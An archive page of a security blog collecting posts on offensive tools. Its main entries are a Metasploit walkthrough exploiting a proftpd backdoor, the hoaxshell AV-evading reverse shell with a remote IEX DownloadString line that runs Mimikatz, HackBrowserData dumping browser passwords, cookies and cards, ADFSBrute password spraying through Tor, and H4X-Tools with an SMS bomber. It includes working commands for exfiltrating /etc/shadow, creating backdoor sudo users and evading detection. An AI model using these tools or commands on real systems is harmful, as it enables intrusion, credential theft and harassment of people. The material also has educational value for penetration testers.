Hacks Archives - Tech Chronicles

H4X-Tools – Designed for Scraping, OSINT and Beyond

Majordomo — Wed, 21 Feb 2024 23:53:50 +0000

Discover the power of H4X-Tools, a versatile toolkit designed for scraping, OSINT (Open-Source Intelligence), and beyond.

From extracting information from social media accounts to conducting phone and IP lookups, H4X-Tools offers a wide array of functionalities to aid researchers, developers, and security enthusiasts alike.

Explore its features, installation process, and community-driven development in this article. Toolkit for scraping, OSINT and more.

Submit feature requests and bugs in the issues tab.

If you want to help with the development, follow the instructions in contributing and simply open a pull request. You can also donate to keep the project alive and me motivated!

Current Tools

Warning

Some tools might not work on Windows systems.

Tool Name	Description
Ig Scrape	Scrapes information from IG accounts.
Web Search	Searches the internet for the given query.
Phone Lookup	Looks up a phone number and returns information about it.
Ip Lookup	Looks up an IP/domain address and returns information about it.
Port Scanner	Scans for open ports in a given IP/domain address.
Username Search	Tries to find a given username from many different websites.
Email Search	Efficiently finds registered accounts from a given email. Thanks to holehe.
Webhook Spammer	Spams messages to a discord webhook.
WhoIs Lookup	Looks up a domain and returns information about it.
SMS Bomber	Spams messages to a given mobile number.
Fake Info Generator	Generates fake information using Faker.
Web Scrape	Scrapes links from a given url.
Wi-Fi Finder	Scans for nearby Wi-Fi networks.
Wi-Fi Password Getter	Scans for locally saved Wi-Fi passwords.
Dir Buster	Bruteforce directories on a website.
Local Accounts Getter	Scans for all local accounts and their information.
Caesar Cipher	Encrypts/decrypts/bruteforce a message using the Caesar cipher.
BaseXX	Encodes/decodes a message using Base64/32/16.
About	Tells you about the tool.
Donate	My crypto addresses where to donate.
Exit	Exits the tool.

Note

-IG Scrape requires you to log in, in order to use it.

-SMS Bomber only works with US numbers.

-You might get rate limited after using some of the tools for too long.

Installation

I’ll upload already built executables to the releases tab, but I’d recommend installing the tool manually by following the instructions below. This way you also get the freshest version.

Setup

Important

Make sure you have Python and Git installed.

View the wiki page for more detailed tutorial.

Linux

Clone the repo git clone https://github.com/vil/h4x-tools.git
Change directory cd h4x-tools
Run sh setup.sh in terminal to install the tool.

Windows

Clone the repo git clone https://github.com/vil/h4x-tools.git
Change directory cd h4x-tools
Run the setup.bat file.

Setup files will automatically build the tool as an executable. You can also run the tool using python h4xtools.py in the terminal.

Also, dependencies can be installed manually using pip install -r requirements.txt.

The post H4X-Tools – Designed for Scraping, OSINT and Beyond appeared first on Tech Chronicles.

Exploiting the proftpd Linux Server

Majordomo — Mon, 24 Jul 2023 22:21:29 +0000

Computer systems get attacked daily. Ransomware, malware, stolen credentials, video game makers’ source code gets leaked, and money drained from users’ accounts dominate our news feeds. But how do hackers gain initial access to compromise a system? Let’s take a look at how a breach could happen.

Don’t get too excited. This Behind the Scenes (BTS) walkthrough is using an old, patched, well-documented vulnerability that was fixed shortly after it was discovered, but it serves as a great example showing how Linux servers are exploited if you don’t keep them patched and up-to-date.

We’ll go through the steps threat actors use to infiltrate a system:

Reconnaissance
Scanning
Obtaining Access
Exfilitrating data
Maintaining Persistence
Pivoting

Lab Environment

The local home lab provides everything we need for this walkthrough.

Vulnerable Linux Machine – Ubuntu 16.04
- proftpd 1.3.3c
- Apache HTTP
- OpenSSH
Attacking Machine – Ubuntu Server 22.04
- Nmap
- Metasploit

These tools are widely used by penetration testers, network administrators, and threat actors alike. The first tool is Nmap, short for Network Mapper. For network admins, Nmap helps to find networked computers, discover open ports, available services, and detect known vulnerabilities on their network. Once a list of services is discovered, they can be exploited.

Scanning with Nmap

This is part of the reconnaissance or scanning phase where the threat actor wants to learn as much about the target system as they can. Because this is a demonstration we are not going to be quiet about our attack and will do nothing to conceal our intentions. We will use -sV option that tells us the current version of any services that are running. This is a noisy attack that should be picked up by most intrusion detection systems or SIEMs.

$ nmap -sV 10.10.10.172

” alt=”” aria-hidden=”true” />

The results from this command reveal a lot about our target system. Each open port is vulnerable to a potential attack. In our simulated attack, we are going to concentrate on the ftp service running the proftpd 1.3.3c software on Port 21.

Port	Protocol	State	Service	Version
21	tcp	open	ftp	proftpd 1.3.3c
22	tcp	open	ssh	OpenSSH 7.2p2
80	tcp	open	http	Apache 2.4.18

The proftpd 1.3.3c software was patched over 10 years ago but serves as a good example of how a vulnerable piece of software can be exploited. It is highly unlikely to still be running as an unpatched service.

Researching Vulnerabilities

We could use Google to learn more about the vulnerabilities in the proftpd 1.3.3c server, or we can use the next tool in our toolbox, Metasploit, and use its built-in database to find known vulnerabilities.

Metasploit is an open-source penetration testing framework that helps network administrators, and security professionals discover vulnerabilities in their systems before exploitation by hackers. Complete with various tools, libraries, user interfaces, and modules, Metasploit allows a user to research, configure a payload, point it at a target, and launch an attack. Metasploit’s extensive database contains hundreds of exploits and payloads. Unfortunately, Metasploit is also widely used by threat actors.

Launching Metasploit

Find installation instructions for Metasploit in the documentation and start the Metasploit framework as root with the following command.

$ sudo msfconsole

” alt=”” aria-hidden=”true” />

Search the Database for Known Exploits

Metasploit comes with an extensive database and technical details of over 180,000 vulnerabilites and 4000 exploits. These are all searchable with the search command from the Metasploit command line. We are going to use this database to find proftpd 1.3.3c vulnerabilities and known exploits.

msf6> search proftpd 1.3.3c

” alt=”” aria-hidden=”true” />

The results of the search command reveal that there is a backdoor command execution exploit. This is what we are going to use to gain access to the Linux server.

Gaining System Access

Let’s begin initial access to the server by configuring our attack by typing use exploit/unix/ftp/proftpd_133c_backdoor or simply the module ID number, use 0.

msf6 > use exploit/unix/ftp/proftpd_133c_backdoor

” alt=”” aria-hidden=”true” />

Use the show payloads command to display the payloads available for the proftpd_133c_backdoor module.

msf6 exploit(unix/ftp/proftpd_133c_backdoor) > show payloads

” alt=”” aria-hidden=”true” />

From the available payloads for the proftpd_133c_backdoor exploit, we are interested in Option 5, the payload/cmd/unix/reverse_perl command. Set the option using the payload number or the full command as follows:

msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set PAYLOAD cmd/unix/reverse_perl

” alt=”” aria-hidden=”true” />

Now we need to make some site-specific configuration settings. The first is the IP address of the target machine. Set the remote host IP address with the RHOSTS command. This is the same IP address we used during our Nmap scan earlier and the machine that is running the proftpd_1.3.3c server.

msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set RHOSTS 10.10.10.172

” alt=”” aria-hidden=”true” />

The local IP address is the computer that we are using for this attack. In our case, the LHOST is 10.10.10.171.

msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set LHOST 10.10.10.171

” alt=”” aria-hidden=”true” />

The Metasploit configuration is complete. Run the exploit with the exploit command.

msf6 exploit(unix/ftp/proftpd_133c_backdoor) > exploit

” alt=”” aria-hidden=”true” />

This exploit takes a few seconds to run. When you see ‘Command shell session 1 opened’ you can issue Linux commands by typing a command name. In our example, entering the whoami command displays the current user, which is root. This is a big deal! Root is the superuser account in UNIX, has administrative purposes, and typically has the highest access rights on the system.

” alt=”” aria-hidden=”true” />

At this point, the system is compromised and you can do whatever you want.

Gaining a Shell

To have any real fun on our compromised system we are going to want a full Linux shell. The following python command spawns a bash shell.

python3 -c 'import pty; pty.spawn("/bin/bash")'

” alt=”” aria-hidden=”true” />

Once we have a proper shell we can move through the system as root, having full access to the Linux environment. This is where the system is most vulnerable. As root we can install rootkits, malware, ransomware, and exfiltrate data.

Data Exfiltration

Data exfiltration is when a threat actor performs the unauthorized copying, transfer, or retrieval of data from a computer or server. As root, we have full access to the computer and can do anything we want including data exfiltration.

The Linux /etc/password file contains a list of system users, combined with the /etc/shadow file which contains encrypted passwords. Together these two files can be hacked to reveal username/password combinations for lateral movement through the network.

Again, we don’t really care about protecting our identity or our intentions (a SIEM would flag this immediately) so we are going to use scp (secure copy) to copy the password and shadow files to our remote server.

” alt=”” aria-hidden=”true” />

And /etc/shadow

” alt=”” aria-hidden=”true” />

We exfiltrated /etc/passwd and /etc/shadow to our local machine. There is no reason that we could not also exfiltrate databases, customer information, stored credit cards, or company-sensitive information out of the network to a remote location as we did with the password files.

Usernames and Passwords

Cracking the hashed passwords is beyond the scope of this walkthrough, but if you can crack the passwords, an attacker can use the same credentials to pivot to other machines across the network. John the Ripper and Hashcat are two well-known password cracking tools that can quickly reveal username/password combinations.

Maintaining Persistence

Persistence in cybersecurity occurs when a threat actor discreetly maintains long-term access to systems despite disruptions such as restarts or changed credentials. As root user, we can perform any administrative task we want, including adding users. One of the ways to maintain persistence is by adding a new user so the threat actor can gain access at a later time. Let’s add a new user.

root@vtsec:/# adduser badguy

” alt=”” aria-hidden=”true” />

And give them superuser access.

root@vtsec:/# usermod -aG sudo badguy

” alt=”” aria-hidden=”true” />

In the Sophos Active Adversary Playbook for 2021, “The median time that attackers were able to remain in the target network before detection – dwell time – was 11 days. This provides attackers with approximately 264 hours for malicious activity, such as lateral movement, reconnaissance, credential dumping, data exfiltration, and more.” Becoming a user of the system is one of the ways they can maintain persistence during this dwell time.

How to Protect Your Network

This type of attack would be caught by Antivirus (AV), Data Loss Prevention (DLP), and other SIEM solutions to control intrusions and data exfiltration. These are all basic cyber security tools that are part of a company’s overall security strategy that focuses on detecting and preventing the loss, leakage, or misuse of data through breaches, exfiltration, and unauthorized use.

Although it’s unlikely to find the proftpd 1.3.3c vulnerability because it was patched a long time ago, protecting your servers from this type of attack is the first step to protecting them. Update your software and perform routine patch management for all of your services.

The post Exploiting the proftpd Linux Server appeared first on Tech Chronicles.

Karkinos – Penetration Testing and Hacking CTF’s Swiss Army Knife

Majordomo — Mon, 23 Jan 2023 19:31:24 +0000

What is Karkinos?

Karkinos is a light-weight ‘Swiss Army Knife’ for penetration testing and/or hacking CTF’s. Currently, Karkinos offers the following:

Encoding/Decoding characters
Encrypting/Decrypting text or files
3 Modules
Cracking and generating hashes

Disclaimer

This tool should be used on applications/networks that you have permission to attack only. Any misuse or damage caused will be solely the users’ responsibility.

More: https://github.com/helich0pper/Karkinos

Dependencies

Any server capable of hosting PHP; tested with Apache Server
Tested with PHP 7.4.9
Tested with Python 3.8
Make sure it is in your path as:
Windows: python
Linux: python3
If it is not, please change the commands in includes/pid.php
pip3
Raspberry Pi Zero friendly (crack hashes at your own risk)

Installing

This installation guide assumes you have all the dependencies. A Wiki page with troubleshooting steps can be found here.

Linux/BSD

git clone https://github.com/helich0pper/Karkinos.git
cd Karkinos
pip3 install -r requirements.txt
cd wordlists && unzip passlist.zip You can also unzip it manually using file explorer. Just make sure passlist.txt is in wordlists directory.
Make sure you have write privileges for db/main.db
Enable extension=mysqli in your php.ini file.
If you don’t know where to find this, refer to the PHP docs. Note: MySQLi is only used to store statistics.
Thats it! Now just host it using your preferred web server or run: php -S 127.0.0.1:8888 in the Karkinos directory.Important: using port 5555, 5556, or 5557 will conflict with the Modules
If you insist on using these ports, change the PORT value in:

- /bin/Server/app.py Line 87
- /bin/Busting/app.py Line 155
- /bin/PortScan/app.py Line 128

Windows

git clone https://github.com/helich0pper/Karkinos.git
cd Karkinos
pip3 install -r requirements.txt
cd wordlists && unzip passlist.zip
You can also unzip it manually using file explorer. Just make sure passlist.txt is in wordlists directory.
Make sure you have write privileges for db/main.db
Enable extension=mysqli.dll in your php.ini file.
If you don’t know where to find this, refer to the PHP docs. Note: MySQLi is only used to store statistics
Thats it! Now just host it using your preferred web server or run: php -S 127.0.0.1:8888 in the Karkinos directory.Important: using port 5555, 5556, or 5557 will conflict with the Modules
If you insist on using these ports, change the PORT value in:

/bin/Server/app.py Line 87
/bin/Busting/app.py Line 155
/bin/PortScan/app.py Line 128

Home Menu

Landing page and quick access menu.

User stats are displayed here. Currently, the stats recorded are only the total hashes and hash types cracked successfully.

Encoding/Decoding

This page allows you to encode/decode in common formats (more may be added soon)

Encrypt/Decrypt

Encrypting and decrypting text or files is made easy and is fully trusted since it is done locally.

Reverse Shell Handling

Reverse shells can be captured and interacted with on this page.

Create a listener instance

Configure the listener

Start the listener and capture a shell

Full reverse shell handling demo:

Directory and File Busting

Create an instance

Configure it

Start scanning

Full Directory and File Busting demo:

Port Scanning

Launch the scanner

Configure it

Start scanning

Full Port Scanning Demo:

Generating Hashes

Karkinos can generate commonly used hashes such as:

MD5
SHA1
SHA256
SHA512

Cracking Hashes

Karkinos offers the option to simultaneously crack hashes using a built-in wordlist consisting of over 15 million common and breached passwords. This list can easily be modified and/or completely replaced.

The post Karkinos – Penetration Testing and Hacking CTF’s Swiss Army Knife appeared first on Tech Chronicles.

hoaxshell – An unconventional Windows reverse shell

Majordomo — Mon, 23 Jan 2023 19:15:12 +0000

Currently undetected by Microsoft Defender and various other AV solutions, solely based on http(s) traffic.

Purpose

hoaxshell is an unconventional Windows reverse shell, currently undetected by Microsoft Defender and possibly other AV solutions as it is solely based on http(s) traffic. The tool is easy to use, it generates its own PowerShell payload and it supports encryption (ssl).

So far, it has been tested on fully updated Windows 11 Enterprise and Windows 10 Pro boxes (see video and screenshots).

More: https://github.com/t3l3machus/hoaxshell

Video Presentation

Screenshots

Find more screenshots here.

Installation

git clone https://github.com/t3l3machus/hoaxshell
cd ./hoaxshell
sudo pip3 install -r requirements.txt
chmod +x hoaxshell.py

Usage

Important: As a means of avoiding detection, hoaxshell is automatically generating random values for the session id, URL paths and name of a custom HTTP header utilized in the process, every time the script is started. The generated payload will work only for the instance it was generated for. Use the -g option to bypass this behavior and re-establish an active session or reuse a past generated payload with a new instance of hoaxshell.

Basic shell session over HTTP

sudo python3 hoaxshell.py -s

When you run hoaxshell, it will generate its own PowerShell payload for you to copy and inject into the victim. By default, the payload is base64 encoded for convenience. If you need the payload raw, execute the “rawpayload” prompt command or start hoaxshell with the -r argument. After the payload has been executed on the victim, you’ll be able to run PowerShell commands against it.

Encrypted shell session (HTTPS):

# Generate self-signed certificate:
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365

# Pass the cert.pem and key.pem as arguments:
sudo python3 hoaxshell.py -s  -c  -k

The generated PowerShell payload will be longer in length because of an additional block of code that disables the SSL certificate validation.

Grab session mode

In case you close your terminal accidentally, have a power outage or something, you can start hoaxshell in grab session mode, it will attempt to re-establish a session, given that the payload is still running on the victim machine.

sudo python3 hoaxshell.py -s  -g

Important: Make sure to start hoaxshell with the same settings as the session you are trying to restore (HTTP/HTTPS, port, etc).

Limitations

The shell is going to hang if you execute a command that initiates an interactive session. Example:

# this command will execute succesfully and you will have no problem: 
> powershell echo 'This is a test'

# But this one will open an interactive session within the hoaxshell session and is going to cause the shell to hang:
> powershell

# In the same manner, you won't have a problem executing this:
> cmd /c dir /a

# But this will cause your hoaxshell to hang:
> cmd.exe

So, if you for example would like to run mimikatz through hoaxshell you would need to invoke the commands:

hoaxshell > IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.13:4443/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Command '"PRIVILEGE::Debug"'

Long story short, you have to be careful to not run an exe or cmd that starts an interactive session within the hoaxshell PowerShell context.

The post hoaxshell – An unconventional Windows reverse shell appeared first on Tech Chronicles.

HackBrowserData – Decrypt passwords/cookies/history/bookmarks from the browser

Majordomo — Wed, 06 Apr 2022 11:19:02 +0000

Disclaimer: This tool is limited to security research only, and the user assumes all legal and related responsibilities arising from its use! The author assumes no legal responsibility!

https://github.com/moonD4rk/HackBrowserData

Supported Browser

Windows

Browser	Password	Cookie	Bookmark	History
Google Chrome
Google Chrome Beta
Chromium
Microsoft Edge
360 Speed
QQ
Brave
Opera
OperaGX
Vivaldi
Yandex
CocCoc
Firefox
Firefox Beta
Firefox Dev
Firefox ESR
Firefox Nightly
Internet Explorer

MacOS

Based on Apple’s security policy, some browsers require a current user password to decrypt.

Browser	Password	Cookie	Bookmark	History
Google Chrome
Google Chrome Beta
Chromium
Microsoft Edge
Brave
Opera
OperaGX
Vivaldi
Yandex
CocCoc
Firefox
Firefox Beta
Firefox Dev
Firefox ESR
Firefox Nightly
Safari

Linux

Browser	Password	Cookie	Bookmark	History
Google Chrome
Google Chrome Beta
Chromium
Microsoft Edge Dev
Brave
Opera
Vivaldi
Firefox
Firefox Beta
Firefox Dev
Firefox ESR
Firefox Nightly

Install

Installation of HackBrowserData is dead-simple, just download the release for your system and run the binary.

In some situations, this security tool will be treated as a virus by Windows Defender or other antivirus software and can not be executed. The code is all open source, you can modify and compile by yourself.

Building from source

support go 1.14+

git clone https://github.com/moonD4rk/HackBrowserData

cd HackBrowserData

go build

Cross compile

Need to install target OS’s gcc library, here’s an example of the use Mac building for Windows and Linus

Windows

brew install mingw-w64

CGO_ENABLED=1 GOOS=windows GOARCH=amd64 CC="x86_64-w64-mingw32-gcc" go build

Linux

brew install FiloSottile/musl-cross/musl-cross

CC=x86_64-linux-musl-gcc CXX=x86_64-linux-musl-g++ GOARCH=amd64 GOOS=linux CGO_ENABLED=1 go build -ldflags "-linkmode external -extldflags -static"

Run

You can double-click to run, or use the command line.

PS C:\test> .\hack-browser-data.exe -h
NAME:
   hack-browser-data - Export passwords/cookies/history/bookmarks from browser
USAGE:
   [hack-browser-data -b chrome -f json -dir results -cc]
   Get all data(password/cookie/history/bookmark) from chrome
VERSION:
   0.3.7

GLOBAL OPTIONS:
   --verbose, --vv                     verbose (default: false)
   --compress, --cc                    compress result to zip (default: false)
   --browser value, -b value           available browsers: all|opera|firefox|chrome|edge (default: "all")
   --results-dir value, --dir value    export dir (default: "results")
   --format value, -f value            format, csv|json|console (default: "csv")
   --profile-dir-path value, -p value  custom profile dir path, get with chrome://version
   --key-file-path value, -k value     custom key file path
   --help, -h                          show help (default: false)
   --version, -v                       print the version (default: false)

PS C:\test>  .\hack-browser-data.exe -b all -f json --dir results -cc
[x]:  Get 44 cookies, filename is results/microsoft_edge_cookie.json
[x]:  Get 54 history, filename is results/microsoft_edge_history.json
[x]:  Get 1 passwords, filename is results/microsoft_edge_password.json
[x]:  Get 4 bookmarks, filename is results/microsoft_edge_bookmark.json
[x]:  Get 6 bookmarks, filename is results/360speed_bookmark.json
[x]:  Get 19 cookies, filename is results/360speed_cookie.json
[x]:  Get 18 history, filename is results/360speed_history.json
[x]:  Get 1 passwords, filename is results/360speed_password.json
[x]:  Get 12 history, filename is results/qq_history.json
[x]:  Get 1 passwords, filename is results/qq_password.json
[x]:  Get 12 bookmarks, filename is results/qq_bookmark.json
[x]:  Get 14 cookies, filename is results/qq_cookie.json
[x]:  Get 28 bookmarks, filename is results/firefox_bookmark.json
[x]:  Get 10 cookies, filename is results/firefox_cookie.json
[x]:  Get 33 history, filename is results/firefox_history.json
[x]:  Get 1 passwords, filename is results/firefox_password.json
[x]:  Get 1 passwords, filename is results/chrome_password.json
[x]:  Get 4 bookmarks, filename is results/chrome_bookmark.json
[x]:  Get 6 cookies, filename is results/chrome_cookie.json
[x]:  Get 6 history, filename is results/chrome_history.json
[x]:  Compress success, zip filename is results/archive.zip

Run with custom browser profile path

PS C:\Users\User\Desktop> .\hack-browser-data.exe -b edge -p 'C:\Users\User\AppData\Local\Microsoft\Edge\User Data\Default' -k 'C:\Users\User\AppData\Local\Microsoft\Edge\User Data\Local State'

[x]:  Get 29 history, filename is results/microsoft_edge_history.csv
[x]:  Get 0 passwords, filename is results/microsoft_edge_password.csv
[x]:  Get 1 credit cards, filename is results/microsoft_edge_credit.csv
[x]:  Get 4 bookmarks, filename is results/microsoft_edge_bookmark.csv
[x]:  Get 54 cookies, filename is results/microsoft_edge_cookie.csv


PS C:\Users\User\Desktop> .\hack-browser-data.exe -b edge -p 'C:\Users\User\AppData\Local\Microsoft\Edge\User Data\Default'

[x]:  Get 1 credit cards, filename is results/microsoft_edge_credit.csv
[x]:  Get 4 bookmarks, filename is results/microsoft_edge_bookmark.csv
[x]:  Get 54 cookies, filename is results/microsoft_edge_cookie.csv
[x]:  Get 29 history, filename is results/microsoft_edge_history.csv
[x]:  Get 0 passwords, filename is results/microsoft_edge_password.csv

The post HackBrowserData – Decrypt passwords/cookies/history/bookmarks from the browser appeared first on Tech Chronicles.

Hacktronian: All in One Hacking Tool for Linux

Majordomo — Sun, 22 Aug 2021 19:05:06 +0000

Hacktronian is an all in one hacking suite for Linux and Android. It contains tools for different phases from information gathering to post exploitation. This makes it a handy tool for any penetration tester.

Hackronian contains a diverse range of tools which allow the user to gain information, attack targets, perform sniffing and snooping on targets and perform post exploitation operations on the target. This main benefit of this suite is that all these different tools are available in one place and the user can experiment with different tools within the same terminal. The secondary benefit of this tool is that it can be installed on Android with all the same features.

Features:

Contains more than 50 different tools
Modules range from information gathering to post exploitation
Available for both Android and Linux
Perfect for creating a penetration testing workflow

HACKTRONIAN Menu :

Information Gathering
Password Attacks
Wireless Testing
Exploitation Tools
Sniffing & Spoofing
Web Hacking
Private Web Hacking
Post Exploitation
Install The HACKTRONIAN

Information Gathering:

Nmap
Setoolkit
Port Scanning
Host To IP
wordpress user
CMS scanner
XSStrike
Dork – Google Dorks Passive Vulnerability Auditor
Scan A server’s Users
Crips

Password Attacks:

Cupp
Ncrack

Wireless Testing:

reaver
pixiewps
Fluxion

Exploitation Tools:

ATSCAN
sqlmap
Shellnoob
commix
FTP Auto Bypass
jboss-autopwn

Sniffing & Spoofing:

Setoolkit
SSLtrip
pyPISHER
SMTP Mailer

Web Hacking:

Drupal Hacking
Inurlbr
WordPress & Joomla Scanner
Gravity Form Scanner
File Upload Checker
WordPress Exploit Scanner
WordPress Plugins Scanner
Shell and Directory Finder
Joomla! 1.5 – 3.4.5 remote code execution
Vbulletin 5.X remote code execution
BruteX – Automatically brute force all services running on a target
Arachni – Web Application Security Scanner Framework

Private Web Hacking:

Get all websites
Get joomla websites
Get wordpress websites
Control Panel Finder
Zip Files Finder
Upload File Finder
Get server users
SQli Scanner
Ports Scan (range of ports)
ports Scan (common ports)
Get server Info
Bypass Cloudflare

Post Exploitation:

Shell Checker
POET
Weeman

Supported Platforms:

Linux
Android (Termux)

Installation in Linux :

This Tool Must Run As ROOT !!!

git clone https://github.com/thehackingsage/hacktronian.git

cd hacktronian

chmod +x install.sh

./install.sh

That’s it.. you can execute tool by typing hacktronian

Installation in Android :

Open Termux

pkg install git

pkg install python

git clone https://github.com/thehackingsage/hacktronian.git

cd hacktronian

chmod +x hacktronian.py

python2 hacktronian.py

Video Tutorial :

YouTube : https://www.youtube.com/watch?v=1LJlyQAQby4

Hacktronian Usage

To execute Hacktronian, run:

$ hacktronian

 _   _    _    ____ _  _______ ____   ___  _   _ ___    _    _   _ 
| | | |  / \  / ___| |/ /_   _|  _ \ / _ \| \ | |_ _|  / \  | \ | |
| |_| | / _ \| |   | ' /  | | | |_) | | | |  \| || |  / _ \ |  \| |
|  _  |/ ___ \ |___| . \  | | |  _ <| |_| | |\  || | / ___ \| |\  |
|_| |_/_/   \_\____|_|\_\ |_| |_| \_\_ __/|_| \_|___/_/   \_\_| \_|
 
[!] This Tool Must Run As ROOT [!] https://linktr.ee/thehackingsage
 
   {1}--Information Gathering
   {2}--Password Attacks
   {3}--Wireless Testing
   {4}--Exploitation Tools
   {5}--Sniffing & Spoofing
   {6}--Web Hacking
   {7}--Private Web Hacking
   {8}--Post Exploitation
   {0}--Install The HACKTRONIAN
   {99}-Exit
 
hacktronian~#

Download: https://github.com/thehackingsage/hacktronian

The post Hacktronian: All in One Hacking Tool for Linux appeared first on Tech Chronicles.

Offensive Security Tool: ADFSBrute

Majordomo — Sun, 25 Apr 2021 23:05:03 +0000

Offensive Security Tool: ADFSBrute

GitHub Link

adfsbrute

ADFSBrute by ricardojoserf, is a script to test credentials against Active Directory Federation Services (ADFS), calculating the ADFS url of an organization and allowing password spraying or bruteforce attacks.

The main idea is carrying out password spraying attacks with a random and high delay between each test and using a list of proxies or Tor to make the detection by the Blue Team more difficult. Brute force attacks are also possible, or testing credentials with the format username:password (for example from Pwndb). Tested logins will get stored in a log file to avoid testing them twice.

Usage

./adfsbrute.py -t TARGET [-u USER] [-U USER_LIST] [-p PASSWORD] [-P PASSWORD_LIST] [-UL userpassword_list]
[-m MIN_TIME] [-M MAX_TIME] [-tp TOR_PASSWORD] [-pl PROXY_LIST] [-n NUMBER_OF_REQUESTS_PER_IP]
[-s STOP_ON_SUCCESS] [-r RANDOM_COMBINATIONS] [-d DEBUG] [-l LOG_FILE]

The parameters for the attacks are:

* -t: Target domain. Example: test.com

* -u: Single username. Example: agarcia@domain.com

* -U: File with a list of usernames. Example: users.txt

* -p: Single password: Example: Company123

* -P: File with a list of passwords. Example: passwords.txt

* -UP: File with a list of credentials in the format "username:password". Example: userpass.txt

* -m : Minimum value of random seconds to wait between each test. Default: 30

* -M : Maximum value of random seconds to wait between each test. Default: 60

* -tp: Tor password (change IP addresses using Tor)

* -pl: Use a proxy list (change IP addresses using a list of proxy IPs)

* -n: Number of requests before changing IP address (used with -tp or -pl). Default: 1

* -s: Stop on success, when one correct credential is found. Default: False

* -r: Randomize the combination of users and passwords. Default: True

* -d: Show debug messages. Default: True

* -l: Log file location with already tested credentials. Default: tested.txt

Examples

Password spraying with password “Company123”, tor password is “test123” and changing the IP every 3 requests:

python3 adfsbrute.py -t company.com -U users.txt -p Company123 -tp test123 -n 3

Password spraying with password “Company123”, tor password is “test123”, changing the IP for every request, random delay time between 10 and 20 seconds and do not randomize the order of users:

python3 adfsbrute.py -t company.com -U users.txt -p Company123 -tp test123 -m 10 -M 20 -r False

Finding ADFS url:

python3 adfsbrute.py -t company.com

Using Tor

To use Tor to change the IP for every request, you must hash a password:

tor --hash-password test123

In the file /etc/tor/torrc, uncomment the variable ControlPort and the variable HashedControlPassword, and in this last one add the hash:

ControlPort 9051
HashedControlPassword 16:7F314CAB402A81F860B3EE449B743AEC0DED9F27FA41831737E2F08F87

Restart the tor service and use this password as argument for the script (“-tp test123” or “–tor_password 123”)

service tor restart

Note

This script is implemented to test in security audits, DO NOT use without proper authorization from the company owning the ADFS or you will block accounts.

The post Offensive Security Tool: ADFSBrute appeared first on Tech Chronicles.

Astsu: Network Scanning Tool

Majordomo — Sun, 21 Feb 2021 15:24:58 +0000

Astsu is a network scanning tool which can be used to perform basic network reconnaissance tasks. It has been developed in Python 3 using the Scapy packet manipulation tool.

Astsu: Network Scanning Tool

Astsu performs three major tasks. The first function is the ability to scan common ports and check whether they are open or not. If a port is open, the tool will then use nmap to check the service being run on the port. The second ability of Astsu is to discover hosts operating on the network. It does this by using the routers IP to map all possible IP’s and then send packets to each IP and wait for a response. The last objective which Astsu achieves is the ability to determine the Operating System of a host on a network. It does this by analyzing a packet received from the target for the OS details.

A great option of this tool is that the user can choose the network protocol to use in the scan. In addition to this, the user can also define how long the tool should wait before it timeouts.

Features:

Perform basic network reconnaissance with this tool
Scan the ports of a target IP address and check which ports are open or closed and what services are running on them
Discover the hosts in a network
Scan a host for the Operating System
Can be used in the reconnaissance phase of a penetration test
Option to use a stealth scan method to hide the user’s identity
Option to scan a range of ports or scan all the ports

How it works

Scan common ports

Send a TCP Syn packet to the destination on the defined port, if the port is open, use an nmap scan to check the service running on the port and prints all the ports found.

Discover hosts in network

Uses as a base the router’s ip to map all possible ips. It then sends an ICMP packet to each IP, and waits for a response, if it receives any response saved in an array the IP of the online host, and when it finishes checking all hosts, prints all hosts online.

OS Scan

Sends an ICMP packet to the destination and waits for a response. Then, extracts the TTL from the destination response and checks the possible OS in a list, if have founded, prints it.

OS Support

Windows
Linux
Mac

How to install

Clone this repository git clone https://github.com/ReddyyZ/astsu.git

Install python 3.
- Linux
  - apt-get install python3
  - chmod +x *
  - python3 -m pip install -r requirements.txt
  - python3 install.py
  - Done!
- Windows
  - Python 3, download and install
  - python3 -m pip install -r requirements.txt
  - python3 install.py
  - Done!

Arguments

-sC | Scan common ports
- -p | Protocol to use in the scan
- -i | Interface to use
- -t | Timeout to each request
- -st | Use stealth scan method (TCP)
-sA | Scan all ports
- -p | Protocol to use in the scan
- -i | Interface to use
- -t | Timeout to each request
- -st | Use stealth scan method (TCP)
-sP | Scan a range ports
- -p | Protocol to use in the scan
- -i | Interface to use
- -t | Timeout to each request
- -st | Use stealth scan method (TCP)
-sO | Scan OS of a target
-d | Discover hosts in the network
- -p | Protocol to use in the scan
- -i | Interface to use

Examples

Discover hosts

astsu -d

Scan common ports using SYN Scan

astsu -sC -st 192.168.1.1

Scan a range of ports

astsu 192.168.1.1 -sP 1 443

Scan OS

astsu -sO 192.168.1.1

License

This project is under the MIT License.

The post Astsu: Network Scanning Tool appeared first on Tech Chronicles.

Vulmap : Web Vulnerability Scanning & Verification Tools

Majordomo — Sun, 31 Jan 2021 20:10:59 +0000

Vulmap is a vulnerability scanning tool that can scan for vulnerabilities in Web containers, Web servers, Web middleware, and CMS and other Web programs, and has vulnerability exploitation functions. Relevant testers can use vulmap to detect whether the target has a specific vulnerability, and can use the vulnerability exploitation function to verify whether the vulnerability actually exists.

It is currently has vulnerability scanning (poc) and exploiting (exp) modes. Use “-m” to select which mode to use, and the default poc mode is the default. In poc mode, it also supports “-f” batch target scanning, “-o” File output results and other main functions, Other functions Options Or python3 vulmap.py -h, the Poc function will no longer be provided in the exploit exploit mode, but the exploit will be carried out directly, and the exploit result will be fed back to further verify whether the vulnerability exists and whether it can be exploited.

Try to use “-a” to establish target types to reduce false positives, such as “-a solr”

Installation

The operating system must have python3, python3.7 or higher is recommended

Installation dependency

pip3 install -r requirements.txt

Linux & MacOS & Windows

python3 vulmap.py -u http://example.com

Options

optional arguments:
-h, –help show this help message and exit
-u URL, –url URL Target URL (e.g. -u “http://example.com”)
-f FILE, –file FILE Select a target list file, and the url must be distinguished by lines (e.g. -f “/home/user/list.txt”)
-m MODE, –mode MODE The mode supports “poc” and “exp”, you can omit this option, and enter poc mode by default
-a APP, –app APP Specify a web app or cms (e.g. -a “weblogic”). default scan all
-c CMD, –cmd CMD Custom RCE vuln command, Other than “netstat -an” and “id” can affect program judgment. defautl is “netstat -an”
-v VULN, –vuln VULN Exploit, Specify the vuln number (e.g. -v “CVE-2020-2729”)
–list Displays a list of vulnerabilities that support scanning
